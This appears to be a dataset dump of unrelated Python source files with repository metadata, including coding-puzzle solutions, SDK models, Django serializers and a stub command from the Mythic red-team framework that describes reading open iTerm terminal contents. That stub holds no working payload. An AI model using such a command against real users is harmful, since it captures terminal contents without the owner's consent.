@register.simple_tag
def sum_main_deposit(user):
result = File.objects.filter(employees__employee=user).aggregate(Sum('main_deposit'))
return result['main_deposit__sum']
|
[
"[email protected]"
] | |
14b450a72c93ad9b78cf7685fe19e4122eb15c24
|
add74ecbd87c711f1e10898f87ffd31bb39cc5d6
|
/xcp2k/classes/_mp21.py
|
562fa5609e8ddc81fe2febf073542f27d358c618
|
[] |
no_license
|
superstar54/xcp2k
|
82071e29613ccf58fc14e684154bb9392d00458b
|
e8afae2ccb4b777ddd3731fe99f451b56d416a83
|
refs/heads/master
| 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 514 |
py
|
from xcp2k.inputsection import InputSection
from xcp2k.classes._mp2_info1 import _mp2_info1
class _mp21(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Section_parameters = None
self.Method = None
self.Big_send = None
self.MP2_INFO = _mp2_info1()
self._name = "MP2"
self._keywords = {'Method': 'METHOD', 'Big_send': 'BIG_SEND'}
self._subsections = {'MP2_INFO': 'MP2_INFO'}
self._attributes = ['Section_parameters']
|
[
"[email protected]"
] | |
4d23735583d49ed6fba1925bf636572e5d146be5
|
2f2e9cd97d65751757ae0a92e8bb882f3cbc5b5b
|
/121.买卖股票的最佳时机.py
|
7cd0e5ce63fc4da08187b59ea4f973e49037b644
|
[] |
no_license
|
mqinbin/python_leetcode
|
77f0a75eb29f8d2f9a789958e0120a7df4d0d0d3
|
73e0c81867f38fdf4051d8f58d0d3dc245be081e
|
refs/heads/main
| 2023-03-10T18:27:36.421262 | 2021-02-25T07:24:10 | 2021-02-25T07:24:10 | 314,410,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 463 |
py
|
#
# @lc app=leetcode.cn id=121 lang=python3
#
# [121] 买卖股票的最佳时机
#
# @lc code=start
class Solution:
def maxProfit(self, prices: List[int]) -> int:
if not prices:
return 0
min_price = prices[0]
max_profit = 0
for i in range(1, len(prices)):
max_profit = max(prices[i] - min_price ,max_profit)
min_price = min(min_price, prices[i])
return max_profit
# @lc code=end
|
[
"[email protected]"
] | |
147b3bc0148ddc69e31304519e65c37ad3c790e6
|
80de5ac86ce85b5aa93788d5d2325d88b87b47f7
|
/cf/1334/c.py
|
0d9603f1d8a8e97a68d5e3f095f080f1f5405a4e
|
[] |
no_license
|
ethicalrushi/cp
|
9a46744d647053fd3d2eaffc52888ec3c190f348
|
c881d912b4f77acfde6ac2ded0dc9e0e4ecce1c1
|
refs/heads/master
| 2022-04-24T07:54:05.350193 | 2020-04-27T20:27:31 | 2020-04-27T20:27:31 | 257,911,320 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,169 |
py
|
t = int(input())
for _ in range(t):
n = int(input())
a =[]
for i in range(n):
u, v = [int(x) for x in input().strip().split()]
a.append([u,v])
if n==1:
res=a[0]
else:
mn = 10**10
si = None
for i in range(1,n):
if a[i][0]>a[i-1][1]:
diff = a[i-1][1]
else:
diff = a[i][0]
if diff<mn:
mn = diff
si = i
if a[0][0]>a[-1][1]:
diff = a[-1][1]
else:
diff = a[0][0]
if diff<mn:
mn = diff
si = 0
# print(si)
if si is None:
res = min(a[i][0] for i in range(n))
else:
# res=0
res=a[si][0]
ct=1
prev_i=si
i = si+1
if i==n:
i=0
while ct<n:
# print(i, prev_i, res)
res+=max(0,a[i][0]-a[prev_i][1])
prev_i = i
i+=1
if i==n:
i=0
ct+=1
print(res)
|
[
"[email protected]"
] | |
ccf640a6f3089b61899c512ea864d117a27d00e3
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/a7WiKcyrTtggTym3f_11.py
|
38c97ae03767b14cd4f73e59493d45390792e3c0
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
"""
Create a function that takes two numbers as arguments and return the LCM of
the two numbers.
### Examples
lcm(3, 5) ➞ 15
lcm(14, 28) ➞ 28
lcm(4, 6) ➞ 12
### Notes
* Don't forget to return the result.
* You may want to use the GCD function to make this a little easier.
* LCM stands for least common multiple, the smallest multiple of both integers.
"""
def lcm(a, b):
m = max(a,b)
while True:
if m%a==0 and m%b==0:
return m
m += 1
|
[
"[email protected]"
] | |
a9151a391b64c038d80fc25c24e8ae9bcc938c36
|
927fc31a0144c308a5c8d6dbe46ba8f2728276c9
|
/tasks/final_tasks/file_handling/2.count_word_in_file.py
|
7ad9f89f0c38383b2a89b17194e5f946ad3c11d8
|
[] |
no_license
|
ChandraSiva11/sony-presamplecode
|
b3ee1ba599ec90e357a4b3a656f7a00ced1e8ad3
|
393826039e5db8a448fa4e7736b2199c30f5ed24
|
refs/heads/master
| 2023-01-14T00:09:19.185822 | 2020-11-23T02:07:00 | 2020-11-23T02:07:00 | 299,527,171 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 268 |
py
|
# Python Program to Count the Number of Words in a Text File
def main():
num_words = 0
with open('text_doc.txt', 'r') as f:
for line in f:
words = line.split()
num_words += len(words)
print('Number of words', num_words)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
dc518d3adbaa5570a85345dacbb2b97213280b09
|
eb35535691c4153ba2a52774f0e40468dfc6383d
|
/hash_table/uncommon_words.py
|
849d39c6b50e9e3e7e62e2067fc6a68f1b0c2178
|
[] |
no_license
|
BJV-git/leetcode
|
1772cca2e75695b3407bed21af888a006de2e4f3
|
dac001f7065c3c5b210024d1d975b01fb6d78805
|
refs/heads/master
| 2020-04-30T19:04:12.837450 | 2019-03-21T21:56:24 | 2019-03-21T21:56:24 | 177,027,662 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 253 |
py
|
def uncommon_words(A,B):
A=A.split(' ')
B=B.split(' ')
res=[]
d={}
for i in A:
d[i] = d.get(i,0)+1
for i in B:
d[i] = d.get(i,0)+1
for i in d:
if d[i]==1:
res.append(i)
return res
|
[
"[email protected]"
] | |
244746f59dab7356af77d6b088d09be0109e7eea
|
5e76a420178dcb9008d6e4c12543ad0e3a50c289
|
/python/104.py
|
188ebec7d7866ddc2ac4ab6f887b025327467442
|
[] |
no_license
|
LichAmnesia/LeetCode
|
da6b3e883d542fbb3cae698a61750bd2c99658fe
|
e890bd480de93418ce10867085b52137be2caa7a
|
refs/heads/master
| 2020-12-25T14:22:58.125158 | 2017-07-18T06:44:53 | 2017-07-18T06:44:53 | 67,002,242 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 596 |
py
|
# -*- coding: utf-8 -*-
# @Author: Lich_Amnesia
# @Email: [email protected]
# @Date: 2016-09-18 17:38:27
# @Last Modified time: 2016-09-18 17:41:20
# @FileName: 104.py
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def maxDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root is None:
return 0
return max(self.maxDepth(root.left), self.maxDepth(root.right)) + 1
|
[
"[email protected]"
] | |
1d898f4d7db5808af12b3e9bd413033060f8403f
|
dfaf6f7ac83185c361c81e2e1efc09081bd9c891
|
/k8sdeployment/k8sstat/python/kubernetes/test/test_v1_local_object_reference.py
|
db02de623a1ffb63d799a47e9d655bb2206d76b9
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
JeffYFHuang/gpuaccounting
|
d754efac2dffe108b591ea8722c831d979b68cda
|
2c63a63c571240561725847daf1a7f23f67e2088
|
refs/heads/master
| 2022-08-09T03:10:28.185083 | 2022-07-20T00:50:06 | 2022-07-20T00:50:06 | 245,053,008 | 0 | 0 |
MIT
| 2021-03-25T23:44:50 | 2020-03-05T02:44:15 |
JavaScript
|
UTF-8
|
Python
| false | false | 994 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1LocalObjectReference(unittest.TestCase):
"""V1LocalObjectReference unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1LocalObjectReference(self):
"""Test V1LocalObjectReference"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_local_object_reference.V1LocalObjectReference() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
d301667e9da5f7d349fdf435dc6c5bdd2dd9d67e
|
46bd3e3ba590785cbffed5f044e69f1f9bafbce5
|
/env/lib/python3.8/site-packages/pip/_vendor/pep517/envbuild.py
|
7e6160fc539bc7bd382d6a660739256889eb380f
|
[] |
no_license
|
adamkluk/casper-getstarted
|
a6a6263f1547354de0e49ba2f1d57049a5fdec2b
|
01e846621b33f54ed3ec9b369e9de3872a97780d
|
refs/heads/master
| 2023-08-13T11:04:05.778228 | 2021-09-19T22:56:59 | 2021-09-19T22:56:59 | 408,036,193 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:2dc493d0c01299c40d2ce16a0cfc43a12d648e4825c7c17a784868049f835a48
size 6112
|
[
"[email protected]"
] | |
7be171b3c6ccd20d4e7c354d4e4620d1a88c649d
|
fa1faa5c480ba249fbec18c0fb79b696d6b4bdf9
|
/4 - Arrays/RemoveKDigits.py
|
2c3dd044de47a9f8f777661c108947dbbc7b6b7f
|
[] |
no_license
|
AbhiniveshP/CodeBreakersCode
|
10dad44c82be352d7e984ba6b7296a7324f01713
|
7dabfe9392d74ec65a5811271b5b0845c3667848
|
refs/heads/master
| 2022-11-14T11:58:24.364934 | 2020-07-11T22:34:04 | 2020-07-11T22:34:04 | 268,859,697 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,180 |
py
|
class Solution:
# Time: O(N) --> a max of double visit
# Space: O(N)
def removeKdigits(self, num: str, k: int) -> str:
stack = []
# before pushing a digit to stack, take care that it is monotonically increasing stack, also k > 0 and stack not empty
for i in range(len(num)):
currentNumber = int(num[i])
while (len(stack) > 0 and k > 0 and currentNumber < stack[-1]):
stack.pop()
k -= 1
stack.append(currentNumber)
# as stack is monotonically increasing => we can pop all lastly added elements until k <= 0
while (k > 0):
stack.pop()
k -= 1
# remove all leading zeros
cursor = 0
while (cursor < len(stack)):
if (stack[cursor] != 0):
break
cursor += 1
stack = stack[cursor:]
# edge case
if (len(stack) == 0):
return '0'
# now join the stack again
return ''.join([str(n) for n in stack])
|
[
"[email protected]"
] | |
20900db7b1b8044e1bf0b27b91907868005a426c
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayInsSceneSellerActivitySignModel.py
|
4ef2bcff18867f0f8ba427a6a7c71a574c386b9c
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 2,623 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneSellerActivitySignModel(object):
def __init__(self):
self._biz_data = None
self._channel_account_id = None
self._channel_account_type = None
self._sp_code = None
@property
def biz_data(self):
return self._biz_data
@biz_data.setter
def biz_data(self, value):
self._biz_data = value
@property
def channel_account_id(self):
return self._channel_account_id
@channel_account_id.setter
def channel_account_id(self, value):
self._channel_account_id = value
@property
def channel_account_type(self):
return self._channel_account_type
@channel_account_type.setter
def channel_account_type(self, value):
self._channel_account_type = value
@property
def sp_code(self):
return self._sp_code
@sp_code.setter
def sp_code(self, value):
self._sp_code = value
def to_alipay_dict(self):
params = dict()
if self.biz_data:
if hasattr(self.biz_data, 'to_alipay_dict'):
params['biz_data'] = self.biz_data.to_alipay_dict()
else:
params['biz_data'] = self.biz_data
if self.channel_account_id:
if hasattr(self.channel_account_id, 'to_alipay_dict'):
params['channel_account_id'] = self.channel_account_id.to_alipay_dict()
else:
params['channel_account_id'] = self.channel_account_id
if self.channel_account_type:
if hasattr(self.channel_account_type, 'to_alipay_dict'):
params['channel_account_type'] = self.channel_account_type.to_alipay_dict()
else:
params['channel_account_type'] = self.channel_account_type
if self.sp_code:
if hasattr(self.sp_code, 'to_alipay_dict'):
params['sp_code'] = self.sp_code.to_alipay_dict()
else:
params['sp_code'] = self.sp_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayInsSceneSellerActivitySignModel()
if 'biz_data' in d:
o.biz_data = d['biz_data']
if 'channel_account_id' in d:
o.channel_account_id = d['channel_account_id']
if 'channel_account_type' in d:
o.channel_account_type = d['channel_account_type']
if 'sp_code' in d:
o.sp_code = d['sp_code']
return o
|
[
"[email protected]"
] | |
d6e1af3c1f70472c05f440c578e0bb66519b95d3
|
205d581673e3960c99e6b8fe1475efb661421cb3
|
/bikeshed/update/main.py
|
1be2b76b3f73f81060b4b4fa57d6141ebd24f5e6
|
[
"CC0-1.0"
] |
permissive
|
TBBle/bikeshed
|
08f9137f7a561d154720297b76ced061cdd6a04a
|
5834a15f311a639c0b59ff2edbf3a060391d15ff
|
refs/heads/master
| 2021-01-12T18:33:43.213471 | 2017-09-29T20:56:24 | 2017-09-29T20:56:24 | 81,327,888 | 0 | 0 | null | 2017-02-08T12:30:22 | 2017-02-08T12:30:21 | null |
UTF-8
|
Python
| false | false | 3,886 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division, unicode_literals
import os
from . import updateCrossRefs
from . import updateBiblio
from . import updateCanIUse
from . import updateLinkDefaults
from . import updateTestSuites
from . import updateLanguages
from . import manifest
from .. import config
from ..messages import *
def update(anchors=False, biblio=False, caniuse=False, linkDefaults=False, testSuites=False, languages=False, path=None, dryRun=False, force=False):
if path is None:
path = config.scriptPath("spec-data")
# Update via manifest by default, falling back to a full update only if failed or forced.
if not force:
success = manifest.updateByManifest(path=path, dryRun=dryRun)
if not success:
say("Falling back to a manual update...")
force = True
if force:
# If all are False, update everything
updateAnyway = not (anchors or biblio or caniuse or linkDefaults or testSuites or languages)
if anchors or updateAnyway:
updateCrossRefs.update(path=path, dryRun=dryRun)
if biblio or updateAnyway:
updateBiblio.update(path=path, dryRun=dryRun)
if caniuse or updateAnyway:
updateCanIUse.update(path=path, dryRun=dryRun)
if linkDefaults or updateAnyway:
updateLinkDefaults.update(path=path, dryRun=dryRun)
if testSuites or updateAnyway:
updateTestSuites.update(path=path, dryRun=dryRun)
if languages or updateAnyway:
updateLanguages.update(path=path, dryRun=dryRun)
manifest.createManifest(path=path, dryRun=dryRun)
def fixupDataFiles():
'''
Checks the readonly/ version is more recent than your current mutable data files.
This happens if I changed the datafile format and shipped updated files as a result;
using the legacy files with the new code is quite bad!
'''
try:
localVersion = int(open(localPath("version.txt"), 'r').read())
except IOError:
localVersion = None
try:
remoteVersion = int(open(remotePath("version.txt"), 'r').read())
except IOError, err:
warn("Couldn't check the datafile version. Bikeshed may be unstable.\n{0}", err)
return
if localVersion == remoteVersion:
# Cool
return
# If versions don't match, either the remote versions have been updated
# (and we should switch you to them, because formats may have changed),
# or you're using a historical version of Bikeshed (ditto).
try:
for filename in os.listdir(remotePath()):
copyanything(remotePath(filename), localPath(filename))
except Exception, err:
warn("Couldn't update datafiles from cache. Bikeshed may be unstable.\n{0}", err)
return
def updateReadonlyDataFiles():
'''
Like fixupDataFiles(), but in the opposite direction --
copies all my current mutable data files into the readonly directory.
This is a debugging tool to help me quickly update the built-in data files,
and will not be called as part of normal operation.
'''
try:
for filename in os.listdir(localPath()):
if filename.startswith("readonly"):
continue
copyanything(localPath(filename), remotePath(filename))
except Exception, err:
warn("Error copying over the datafiles:\n{0}", err)
return
def copyanything(src, dst):
import shutil
import errno
try:
shutil.rmtree(dst, ignore_errors=True)
shutil.copytree(src, dst)
except OSError as exc:
if exc.errno in [errno.ENOTDIR, errno.EINVAL]:
shutil.copy(src, dst)
else:
raise
def localPath(*segs):
return config.scriptPath("spec-data", *segs)
def remotePath(*segs):
return config.scriptPath("spec-data", "readonly", *segs)
|
[
"[email protected]"
] | |
3183747cd1835046d97a500fd56fc5a714d8f69c
|
f90a30cfafc5d786a3dc269f3ca48dce3fc59028
|
/Payload_Types/apfell/mythic/agent_functions/iterm.py
|
94b35b48c3156d56770b68fba7a567e64efb0415
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
NotoriousRebel/Mythic
|
93026df4a829b7b88de814e805fdce0ab19f3ab9
|
4576654af4025b124edb88f9cf9d0821f0b73070
|
refs/heads/master
| 2022-12-03T01:19:20.868900 | 2020-08-18T03:48:55 | 2020-08-18T03:48:55 | 288,780,757 | 1 | 0 |
NOASSERTION
| 2020-08-19T16:20:19 | 2020-08-19T16:20:18 | null |
UTF-8
|
Python
| false | false | 920 |
py
|
from CommandBase import *
import json
class ITermArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {}
async def parse_arguments(self):
pass
class ITermCommand(CommandBase):
cmd = "iTerm"
needs_admin = False
help_cmd = "iTerm"
description = "Read the contents of all open iTerm tabs if iTerms is open, otherwise just inform the operator that it's not currently running"
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1139", "T1056"]
argument_class = ITermArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass
|
[
"[email protected]"
] | |
62f15e21cc7da0172f76ec0118796903115796ca
|
4944541b0cd0fa48a01581ffce5e7ce16f5cf8d7
|
/src/Backend/MbkExam/Notification/serializers.py
|
a64b1c49829f6af25ac8f32051e5c5e42e2348cb
|
[] |
no_license
|
aballah-chamakh/the_exam
|
49a5b5c9d28c61b2283f2d42d2b2fb771dd48bf4
|
dbbbdc7a955ca61572f26430a7788407eaf0c632
|
refs/heads/main
| 2023-03-28T13:19:18.148630 | 2021-04-03T22:12:51 | 2021-04-03T22:12:51 | 354,404,833 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 912 |
py
|
from rest_framework import serializers
from .models import AdminNotification,StudentNotification
class AdminNotificationSerializer(serializers.ModelSerializer):
student_username = serializers.CharField(source='student.user.username')
student_img = serializers.CharField(source="student.image.url")
student_slug = serializers.SlugField(source="student.slug")
student_email = serializers.CharField(source="student.user.email")
class Meta :
model = AdminNotification
fields = ('student_email','student_img','student_username',"student_slug",'event_type','event_msg','event_slug','datetime','viewed')
class StudentNotificationSerializer(serializers.ModelSerializer):
student_slug = serializers.SlugField(source="student.slug")
class Meta :
model = StudentNotification
fields = ('student_slug','event_type','event_msg','event_slug','datetime','viewed')
|
[
"[email protected]"
] | |
4c800d767661ee69f80d462a929fd68be4f8b58f
|
a39dbda2d9f93a126ffb189ec51a63eb82321d64
|
/mongoengine/queryset/__init__.py
|
026a7acdd533719065dcc1c7c1955565b13d6f6f
|
[
"MIT"
] |
permissive
|
closeio/mongoengine
|
6e22ec67d991ea34c6fc96e9b29a9cbfa945132b
|
b083932b755a9a64f930a4a98b0129f40f861abe
|
refs/heads/master
| 2023-04-30T04:04:52.763382 | 2023-04-20T07:13:41 | 2023-04-20T07:13:41 | 5,533,627 | 21 | 5 |
MIT
| 2023-04-20T07:13:42 | 2012-08-23T23:02:20 |
Python
|
UTF-8
|
Python
| false | false | 525 |
py
|
from mongoengine.errors import (DoesNotExist, MultipleObjectsReturned,
InvalidQueryError, OperationError,
NotUniqueError)
from mongoengine.queryset.field_list import *
from mongoengine.queryset.manager import *
from mongoengine.queryset.queryset import *
from mongoengine.queryset.transform import *
from mongoengine.queryset.visitor import *
__all__ = (field_list.__all__ + manager.__all__ + queryset.__all__ +
transform.__all__ + visitor.__all__)
|
[
"[email protected]"
] | |
da0f752f37d66f5033607317460320c51b7d99e2
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/ec2_write_f/vpc_create.py
|
72acec139ecc5774ba67c1d8199de44fc116c546
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 588 |
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
delete-vpc : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-vpc.html
describe-vpcs : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-vpcs.html
"""
write_parameter("ec2", "create-vpc")
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.